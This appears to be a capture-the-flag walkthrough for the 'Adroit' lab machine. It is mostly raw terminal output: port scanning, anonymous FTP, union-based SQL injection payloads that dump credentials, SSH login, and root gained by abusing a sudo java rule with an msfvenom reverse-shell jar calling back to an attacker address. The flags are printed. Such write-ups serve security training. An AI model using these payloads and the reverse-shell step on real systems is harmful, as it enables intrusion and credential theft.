36.Adroit

┌──(root㉿kali)-[~]
└─# fscan -h 192.168.80.11

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.80.11:3306 open
192.168.80.11:3000 open
192.168.80.11:21 open
192.168.80.11:22 open
[*] alive ports len is: 4
start vulscan
[+] ftp 192.168.80.11:21:anonymous
   [->]pub

ftp> ls -a
229 Entering Extended Passive Mode (|||40570|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 19  2021 .
drwxr-xr-x    3 ftp      ftp          4096 Jan 14  2021 ..
-rw-r--r--    1 ftp      ftp          5451 Jan 14  2021 adroitclient.jar
-rw-r--r--    1 ftp      ftp           229 Mar 19  2021 note.txt
-rw-r--r--    1 ftp      ftp         36430 Jan 14  2021 structure.PNG

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
Sup3rS3cur3Dr0it
Wrong username or password   

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1

┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :

1 union select 1,database() -- -
--> adroit

1 union select 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema ='adroit' -- -
-->  ideas,users

1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' -- -
--> 
id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

1 union select 1,group_concat(username,0x3a,password) from users -- -
--> writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=

writer ： just.write.my.ideas
┌──(root㉿kali)-[/home/kali/hmv/Adroit]
└─# ssh writer@192.168.80.11
writer@192.168.80.11''s password:
Linux adroit 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 14 23:14:06 2021 from 10.0.2.15
writer@adroit:~$ id
uid=1000(writer) gid=1000(writer) groups=1000(writer),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
writer@adroit:~$ whoami
writer

writer@adroit:~$ sudo -l
[sudo] password for writer:
Matching Defaults entries for writer on adroit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User writer may run the following commands on adroit:
    (root) /usr/bin/java -jar /tmp/testingmyapp.jar

msfvenom -p java/shell_reverse_tcp lhost=192.168.80.5 lport=4444 -f jar -o reverse.jar

writer@adroit:/tmp$ cp reverse.jar  /tmp/testingmyapp.jar
writer@adroit:/tmp$ sudo -u root java -jar /tmp/testingmyapp.jar

[17:54:28] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:56:16] received connection from 192.168.80.11:51550                                                     bind.py:84
[17:56:17] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                  manager.py:957
           192.168.80.11:51550: registered new host w/ db                                               manager.py:957
(local) pwncat$
(remote) root@adroit:/tmp# whoami
root
(remote) root@adroit:/root# ls
root.txt
(remote) root@adroit:/root# cat root.txt
017a030885f25af277dd891d0f151845
(remote) root@adroit:/root# cd /home/writer/
(remote) root@adroit:/home/writer# cat user.txt
61de3a25161dcb2b88b5119457690c3c
(remote) root@adroit:/home/writer#